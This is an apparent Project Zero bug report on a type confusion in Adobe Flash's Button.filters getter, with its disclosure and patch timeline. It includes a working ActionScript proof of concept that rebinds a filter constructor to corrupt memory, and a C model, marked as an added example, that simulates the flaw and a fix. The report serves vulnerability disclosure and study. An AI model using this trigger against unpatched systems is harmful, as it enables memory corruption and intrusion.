Adobe Flash: Type Confusion in Button.filters
Project Member Reported by natashenka@google.com, Feb 6 2015
There is a type confusion issue in the Button.filters getter. If the definition of a filter constructor changes to that of a different filter between the Button.filters setter and the Button.filters getter, the filter's user data gets set to the type of the filter given to the setter, but its type gets set to the type its constructor is defined as when the getter is called. A minimal proof of concept (must be called from a button's action) is below:
// Build a BlurFilter; its user data is stored as blur data by the setter
var c = new flash.filters.BlurFilter(100, 15, 5555);
c.blurX = -1;
var e = flash.filters.ConvolutionFilter;
this.filters = [c];
// Rebind the BlurFilter constructor to ConvolutionFilter between the setter and the getter
flash["filters"] = {BlurFilter: e};
// The getter now resolves the stored element as a ConvolutionFilter
var f = this.filters;
var d = f[0];
trace(d.matrix.length);
d.matrix = [0,1,1,1,1,1,1,1,1,1,1,1,1,1];
trace(d.color = 0x777777777777);
for(var i = 0; i < 1000; i++){
var b = new BitmapData(10, 10, true, 10); //This tends to trigger GC
}
A .fla file and swf are attached. To reproduce, press the grey button. The PoC works on Chrome and Firefox for Linux only, likely due to differences in when GC occurs.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
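The set/get ordering the report describes, modelled in C as an added example. This is not Flash Player code and not part of the original report: the struct layouts, the constructor-binding variable and every function name are invented for illustration. It replays the PoC's steps (construct a BlurFilter, assign it to filters, rebind the BlurFilter constructor, read filters back) against a getter that derives the element's type from the current constructor binding, and against one that uses the type recorded when the data was stored. Only the first hands back a convolution view over blur-sized data, whose matrix_x * matrix_y length then reaches past the stored bytes.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Kinds of native filter object. Names and layouts here are invented for
 * the model; they are not Flash Player's real structures. */
typedef enum { FILTER_BLUR = 1, FILTER_CONVOLUTION = 2 } filter_kind;

typedef struct { int blur_x, blur_y, quality; } blur_data;               /* BlurFilter(blurX, blurY, quality) */
typedef struct { int matrix_x, matrix_y; double matrix[16]; } conv_data; /* ConvolutionFilter(matrixX, matrixY, matrix) */

/* What the native side keeps per element of Button.filters: the copied
 * user data, the constructor name, and (for the fixed getter) the kind. */
typedef struct {
    const char   *ctor_name;
    filter_kind   kind_at_set_time;
    unsigned char data[sizeof(conv_data)];
    size_t        data_len;
} stored_filter;

/* Script-visible binding of flash.filters.BlurFilter. The PoC's
 * flash["filters"] = {BlurFilter: e} rebinds it to ConvolutionFilter. */
static filter_kind blur_ctor_binding = FILTER_BLUR;

static filter_kind lookup_ctor(const char *name) {
    return strcmp(name, "BlurFilter") == 0 ? blur_ctor_binding : FILTER_CONVOLUTION;
}

/* Setter (this.filters = [c]): copies the BlurFilter's user data. */
static void filters_set(stored_filter *s, const blur_data *b) {
    s->ctor_name = "BlurFilter";
    s->kind_at_set_time = FILTER_BLUR;
    memcpy(s->data, b, sizeof *b);
    s->data_len = sizeof *b;
}

/* Vulnerable getter (var f = this.filters): picks the result type from
 * whatever the constructor name resolves to now, not from the data. */
static filter_kind get_kind_vulnerable(const stored_filter *s) {
    return lookup_ctor(s->ctor_name);
}

/* Fixed getter: the type tag travels with the data it was stored with. */
static filter_kind get_kind_fixed(const stored_filter *s) {
    return s->kind_at_set_time;
}

/* ConvolutionFilter.matrix.length as the engine would compute it once the
 * object is tagged as a convolution filter: it trusts matrix_x * matrix_y,
 * which here are really blur_x and blur_y. */
static long conv_matrix_length(const stored_filter *s) {
    int header[2];
    memcpy(header, s->data, sizeof header);
    return (long)header[0] * header[1];
}

/* True when a matrix of matrix_len doubles would extend past the bytes the
 * setter actually stored, so the read or write that follows is out of bounds. */
static bool matrix_out_of_bounds(const stored_filter *s, long matrix_len) {
    if (matrix_len < 0) return true;
    size_t needed = offsetof(conv_data, matrix) + (size_t)matrix_len * sizeof(double);
    return needed > s->data_len;
}

/* Replays the PoC's ordering. Returns true if the vulnerable getter hands
 * back a convolution view over blur bytes; reports the confused length and
 * whether touching that matrix would run out of bounds. */
bool replay_poc(long *matrix_len, bool *oob) {
    stored_filter s;
    blur_data c = { 100, 15, 5555 };          /* new flash.filters.BlurFilter(100, 15, 5555) */
    blur_ctor_binding = FILTER_BLUR;
    filters_set(&s, &c);                      /* this.filters = [c] */
    blur_ctor_binding = FILTER_CONVOLUTION;   /* flash["filters"] = {BlurFilter: e} */
    if (get_kind_vulnerable(&s) != FILTER_CONVOLUTION) return false;
    *matrix_len = conv_matrix_length(&s);     /* trace(d.matrix.length) */
    *oob = matrix_out_of_bounds(&s, *matrix_len);
    return true;
}

/* Same sequence against the fixed getter: the element stays a BlurFilter. */
bool fixed_getter_keeps_blur(void) {
    stored_filter s;
    blur_data c = { 100, 15, 5555 };
    blur_ctor_binding = FILTER_BLUR;
    filters_set(&s, &c);
    blur_ctor_binding = FILTER_CONVOLUTION;
    return get_kind_fixed(&s) == FILTER_BLUR;
}

int main(void) {
    long len;
    bool oob;
    if (replay_poc(&len, &oob))
        printf("confused matrix length %ld, out of bounds: %s\n", len, oob ? "yes" : "no");
    printf("fixed getter keeps BlurFilter: %s\n", fixed_getter_keeps_blur() ? "yes" : "no");
    return 0;
}
```

With the constructor arguments from the PoC the confused view reports a 100 x 15 matrix, 12000 bytes of doubles, over 12 bytes of stored blur data. The fix the model illustrates is the general one for this bug class: a native object's type tag must be fixed when its storage is allocated, never re-derived later from a script-controllable binding.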
Comment 1 by cevans@google.com, Feb 7 2015

Feb 12 2015
Chromium bug https://code.google.com/p/chromium/issues/detail?id=457261 was filed by @biloulehibou as a duplicate of this one.

May 5 2015
Patch is expected May 12th, which is 6 days into the 14 day grace period.

May 7 2015

May 12 2015
https://helpx.adobe.com/security/products/flash-player/apsb15-09.html

May 28 2015

Jul 20 2015
Attaching exploit